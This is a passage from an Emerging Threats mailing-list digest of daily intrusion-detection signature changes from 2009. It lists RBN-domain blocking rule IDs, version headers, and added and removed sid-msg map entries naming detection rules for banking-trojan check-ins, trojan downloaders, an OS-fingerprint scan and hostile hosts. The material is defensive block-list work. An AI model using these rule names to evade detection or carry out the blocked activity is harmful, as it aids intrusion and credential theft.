 2407106 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (107) (emerging-rbn-BLOCK.rules)
 2407107 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (108) (emerging-rbn-BLOCK.rules)
 2407108 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (109) (emerging-rbn-BLOCK.rules)
 2407109 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (110) (emerging-rbn-BLOCK.rules)
 2407110 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (111) (emerging-rbn-BLOCK.rules)
 2407111 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (112) (emerging-rbn-BLOCK.rules)
 2407112 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (113) (emerging-rbn-BLOCK.rules)
 2407113 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (114) (emerging-rbn-BLOCK.rules)
 2407114 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (115) (emerging-rbn-BLOCK.rules)
 2407115 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (116) (emerging-rbn-BLOCK.rules)
 2407116 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (117) (emerging-rbn-BLOCK.rules)
 2407117 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (118) (emerging-rbn-BLOCK.rules)
 2407118 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (119) (emerging-rbn-BLOCK.rules)
 2407119 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (120) (emerging-rbn-BLOCK.rules)
 2407120 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (121) (emerging-rbn-BLOCK.rules)
 2407121 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (122) (emerging-rbn-BLOCK.rules)
 2407122 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (123) (emerging-rbn-BLOCK.rules)
 2407123 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (124) (emerging-rbn-BLOCK.rules)
 2407124 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (125) (emerging-rbn-BLOCK.rules)
 2407125 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (126) (emerging-rbn-BLOCK.rules)
 2407126 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (127) (emerging-rbn-BLOCK.rules)
 2407127 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (128) (emerging-rbn-BLOCK.rules)
 2407128 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (129) (emerging-rbn-BLOCK.rules)
 2407129 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (130) (emerging-rbn-BLOCK.rules)
 2407130 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (131) (emerging-rbn-BLOCK.rules)
 2407131 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (132) (emerging-rbn-BLOCK.rules)
 2407132 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (133) (emerging-rbn-BLOCK.rules)
 2407133 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (134) (emerging-rbn-BLOCK.rules)
 2407134 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (135) (emerging-rbn-BLOCK.rules)
 2407135 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (136) (emerging-rbn-BLOCK.rules)
 2407136 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (137) (emerging-rbn-BLOCK.rules)
 2407137 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (138) (emerging-rbn-BLOCK.rules)
 2407138 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (139) (emerging-rbn-BLOCK.rules)
 2407139 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (140) (emerging-rbn-BLOCK.rules)
 2407140 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (141) (emerging-rbn-BLOCK.rules)
 2407141 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (142) (emerging-rbn-BLOCK.rules)
 2407142 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (143) (emerging-rbn-BLOCK.rules)
 2407143 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (144) (emerging-rbn-BLOCK.rules)
 2407144 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (145) (emerging-rbn-BLOCK.rules)
 2407145 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (146) (emerging-rbn-BLOCK.rules)
 2407146 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (147) (emerging-rbn-BLOCK.rules)
 2407147 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (148) (emerging-rbn-BLOCK.rules)
 2407148 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (149) (emerging-rbn-BLOCK.rules)
 2407149 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (150) (emerging-rbn-BLOCK.rules)
 2407150 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (151) (emerging-rbn-BLOCK.rules)
 2407151 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (152) (emerging-rbn-BLOCK.rules)
 2407152 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (153) (emerging-rbn-BLOCK.rules)
 2407153 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (154) (emerging-rbn-BLOCK.rules)
 2407154 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (155) (emerging-rbn-BLOCK.rules)
 2407155 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (156) (emerging-rbn-BLOCK.rules)
 2407156 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (157) (emerging-rbn-BLOCK.rules)
 2407157 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (158) (emerging-rbn-BLOCK.rules)
 2407158 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (159) (emerging-rbn-BLOCK.rules)
 2407159 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (160) (emerging-rbn-BLOCK.rules)
 2407160 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (161) (emerging-rbn-BLOCK.rules)
 2407161 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (162) (emerging-rbn-BLOCK.rules)
 2407162 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (163) (emerging-rbn-BLOCK.rules)
 2407163 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (164) (emerging-rbn-BLOCK.rules)
 2407164 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (165) (emerging-rbn-BLOCK.rules)
 2407165 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (166) (emerging-rbn-BLOCK.rules)
 2407166 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (167) (emerging-rbn-BLOCK.rules)
 2407167 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (168) (emerging-rbn-BLOCK.rules)
 2407168 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (169) (emerging-rbn-BLOCK.rules)
 2407169 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (170) (emerging-rbn-BLOCK.rules)
 2407170 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (171) (emerging-rbn-BLOCK.rules)
 2407171 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (172) (emerging-rbn-BLOCK.rules)
 2407172 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (173) (emerging-rbn-BLOCK.rules)
 2407173 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (174) (emerging-rbn-BLOCK.rules)
 2407174 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (175) (emerging-rbn-BLOCK.rules)
 2407175 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (176) (emerging-rbn-BLOCK.rules)
 2407176 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (177) (emerging-rbn-BLOCK.rules)
 2407177 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (178) (emerging-rbn-BLOCK.rules)
 2407178 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (179) (emerging-rbn-BLOCK.rules)
 2407179 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (180) (emerging-rbn-BLOCK.rules)
 2407180 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (181) (emerging-rbn-BLOCK.rules)
 2407181 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (182) (emerging-rbn-BLOCK.rules)
 2407182 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (183) (emerging-rbn-BLOCK.rules)
 2407183 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (184) (emerging-rbn-BLOCK.rules)
 2407184 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (185) (emerging-rbn-BLOCK.rules)
 2407185 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (186) (emerging-rbn-BLOCK.rules)
 2407186 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (187) (emerging-rbn-BLOCK.rules)
 2407187 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (188) (emerging-rbn-BLOCK.rules)
 2407188 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (189) (emerging-rbn-BLOCK.rules)
 2407189 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (190) (emerging-rbn-BLOCK.rules)
 2407190 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (191) (emerging-rbn-BLOCK.rules)
 2407191 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (192) (emerging-rbn-BLOCK.rules)
 2407192 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (193) (emerging-rbn-BLOCK.rules)
 2407193 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (194) (emerging-rbn-BLOCK.rules)
 2407194 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (195) (emerging-rbn-BLOCK.rules)
 2407195 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (196) (emerging-rbn-BLOCK.rules)
 2407196 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (197) (emerging-rbn-BLOCK.rules)
 2407197 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (198) (emerging-rbn-BLOCK.rules)
 2407198 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (199) (emerging-rbn-BLOCK.rules)
 2407199 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (200) (emerging-rbn-BLOCK.rules)
 2407200 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (201) (emerging-rbn-BLOCK.rules)
 2407201 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (202) (emerging-rbn-BLOCK.rules)
 2407202 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (203) (emerging-rbn-BLOCK.rules)
 2407203 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (204) (emerging-rbn-BLOCK.rules)
 2407204 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (205) (emerging-rbn-BLOCK.rules)
 2407205 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (206) (emerging-rbn-BLOCK.rules)
 2407206 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (207) (emerging-rbn-BLOCK.rules)
 2407207 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (208) (emerging-rbn-BLOCK.rules)
 2407208 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (209) (emerging-rbn-BLOCK.rules)
 2407209 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (210) (emerging-rbn-BLOCK.rules)
 2407210 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (211) (emerging-rbn-BLOCK.rules)
 2407211 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (212) (emerging-rbn-BLOCK.rules)
 2407212 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (213) (emerging-rbn-BLOCK.rules)
 2407213 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (214) (emerging-rbn-BLOCK.rules)
 2407214 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (215) (emerging-rbn-BLOCK.rules)
 2407215 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (216) (emerging-rbn-BLOCK.rules)
 2407216 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (217) (emerging-rbn-BLOCK.rules)
 2407217 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (218) (emerging-rbn-BLOCK.rules)
 2407218 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (219) (emerging-rbn-BLOCK.rules)
 2407219 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (220) (emerging-rbn-BLOCK.rules)
 2407220 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (221) (emerging-rbn-BLOCK.rules)
 2407221 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (222) (emerging-rbn-BLOCK.rules)
 2407222 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (223) (emerging-rbn-BLOCK.rules)
 2407223 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (224) (emerging-rbn-BLOCK.rules)
 2407224 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (225) (emerging-rbn-BLOCK.rules)
 2407225 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (226) (emerging-rbn-BLOCK.rules)
 2407226 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (227) (emerging-rbn-BLOCK.rules)
 2407227 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (228) (emerging-rbn-BLOCK.rules)
 2407228 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (229) (emerging-rbn-BLOCK.rules)
 2407229 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (230) (emerging-rbn-BLOCK.rules)
 2407230 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (231) (emerging-rbn-BLOCK.rules)
 2407231 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (232) (emerging-rbn-BLOCK.rules)
 2407232 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (233) (emerging-rbn-BLOCK.rules)
 2407233 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (234) (emerging-rbn-BLOCK.rules)
 2407234 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (235) (emerging-rbn-BLOCK.rules)
 2407235 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (236) (emerging-rbn-BLOCK.rules)
 2407236 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (237) (emerging-rbn-BLOCK.rules)
 2407237 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (238) (emerging-rbn-BLOCK.rules)
 2407238 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (239) (emerging-rbn-BLOCK.rules)
 2407239 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (240) (emerging-rbn-BLOCK.rules)
 2407240 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (241) (emerging-rbn-BLOCK.rules)
 2407241 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (242) (emerging-rbn-BLOCK.rules)
 2407242 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (243) (emerging-rbn-BLOCK.rules)
 2407243 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (244) (emerging-rbn-BLOCK.rules)
 2407244 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (245) (emerging-rbn-BLOCK.rules)
 2407245 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (246) (emerging-rbn-BLOCK.rules)
 2407246 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (247) (emerging-rbn-BLOCK.rules)
 2407247 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (248) (emerging-rbn-BLOCK.rules)
 2407248 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (249) (emerging-rbn-BLOCK.rules)
 2407249 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (250) (emerging-rbn-BLOCK.rules)
 2407250 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (251) (emerging-rbn-BLOCK.rules)
 2407251 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (252) (emerging-rbn-BLOCK.rules)
 2407252 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (253) (emerging-rbn-BLOCK.rules)
 2407253 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (254) (emerging-rbn-BLOCK.rules)
 2407254 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (255) (emerging-rbn-BLOCK.rules)
 2407255 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (256) (emerging-rbn-BLOCK.rules)
 2407256 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (257) (emerging-rbn-BLOCK.rules)
 2407257 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (258) (emerging-rbn-BLOCK.rules)
 2407258 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (259) (emerging-rbn-BLOCK.rules)
 2407259 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (260) (emerging-rbn-BLOCK.rules)
 2407260 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (261) (emerging-rbn-BLOCK.rules)
 2407261 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (262) (emerging-rbn-BLOCK.rules)
 2407262 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (263) (emerging-rbn-BLOCK.rules)
 2407263 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (264) (emerging-rbn-BLOCK.rules)
 2407264 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (265) (emerging-rbn-BLOCK.rules)
 2407265 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (266) (emerging-rbn-BLOCK.rules)
 2407266 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (267) (emerging-rbn-BLOCK.rules)
 2407267 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (268) (emerging-rbn-BLOCK.rules)
 2407268 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (269) (emerging-rbn-BLOCK.rules)
 2407269 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (270) (emerging-rbn-BLOCK.rules)
 2407270 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (271) (emerging-rbn-BLOCK.rules)
 2407271 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (272) (emerging-rbn-BLOCK.rules)
 2407272 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (273) (emerging-rbn-BLOCK.rules)
 2407273 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (274) (emerging-rbn-BLOCK.rules)
 2407274 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (275) (emerging-rbn-BLOCK.rules)
 2407275 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (276) (emerging-rbn-BLOCK.rules)
 2407276 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (277) (emerging-rbn-BLOCK.rules)
 2407277 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (278) (emerging-rbn-BLOCK.rules)
 2407278 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (279) (emerging-rbn-BLOCK.rules)
 2407279 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (280) (emerging-rbn-BLOCK.rules)
 2407280 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (281) (emerging-rbn-BLOCK.rules)
 2407281 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (282) (emerging-rbn-BLOCK.rules)
 2407282 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (283) (emerging-rbn-BLOCK.rules)
 2407283 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (284) (emerging-rbn-BLOCK.rules)
 2407284 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (285) (emerging-rbn-BLOCK.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-drop-BLOCK.rules (2):
        #  VERSION 1527
        #  Generated 2009-05-02 00:03:03 EDT

     -> Added to emerging-drop.rules (2):
        #  VERSION 1527
        #  Generated 2009-05-02 00:03:03 EDT

     -> Added to emerging-rbn-BLOCK.rules (2):
        #  VERSION 127
        #  Updated 2009-04-29 09:08:59

     -> Added to emerging-rbn.rules (2):
        #  VERSION 127
        #  Updated 2009-04-29 09:08:59

     -> Added to emerging-sid-msg.map (6):
        2009296 || ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin
        2009297 || ET TROJAN Boaxxe HTTP POST Checkin
        2009298 || ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan || url,xprobe.sourceforge.net/
        2009299 || ET TROJAN General Trojan Downloader
        2400008 || ET DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso
        2401008 || ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso

     -> Added to emerging-sid-msg.map.txt (6):
        2009296 || ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin
        2009297 || ET TROJAN Boaxxe HTTP POST Checkin
        2009298 || ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan || url,xprobe.sourceforge.net/
        2009299 || ET TROJAN General Trojan Downloader
        2400008 || ET DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso
        2401008 || ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso

     -> Added to emerging-virus.rules (1):
        #Matt jonkman, re 0d3ff9cfa6b1d6a8aeabaf0d73e1fc5c

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-drop-BLOCK.rules (2):
        #  VERSION 1520
        #  Generated 2009-04-25 00:03:02 EDT

     -> Removed from emerging-drop.rules (2):
        #  VERSION 1520
        #  Generated 2009-04-25 00:03:02 EDT

     -> Removed from emerging-rbn-BLOCK.rules (2):
        #  VERSION 126
        #  Updated 2009-04-21 14:13:05

     -> Removed from emerging-rbn.rules (2):
        #  VERSION 126
        #  Updated 2009-04-21 14:13:05

     -> Removed from emerging-sid-msg.map (22):
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (22):
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From emerging at emergingthreats.net  Sun May  3 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sun,  3 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090503200010.BFE064501B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sun May  3 16:00:10 2009 [***]

[*] Rules modifications: [*]
    None.

[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (20):
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
